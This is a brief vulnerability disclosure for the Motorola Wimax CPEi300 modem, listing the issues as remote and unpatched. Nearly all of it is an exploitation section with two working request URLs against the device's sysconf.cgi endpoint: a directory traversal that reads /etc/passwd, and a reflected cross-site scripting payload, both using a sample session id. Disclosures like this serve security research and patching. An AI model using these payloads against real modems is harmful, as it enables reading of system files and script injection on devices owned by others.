Motorola Wimax CPEi300 Directory Traversal / XSS

`#####################################################################################  
#  
# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities  
# Author : Usman Saeed   
# Company : Xc0re Security Reasearch Group  
# Homepage : http://www.xc0re.net  
#  
#####################################################################################  
  
  
[Note: User needs to logged in! ]  
  
[*] Attack type : Remote  
  
[*] Patch Status : Unpatched  
  
[*] Exploitation :   
  
[+] Directory traversal  
http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs   
  
[+] XSS   
  
http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs   
  
  
  
`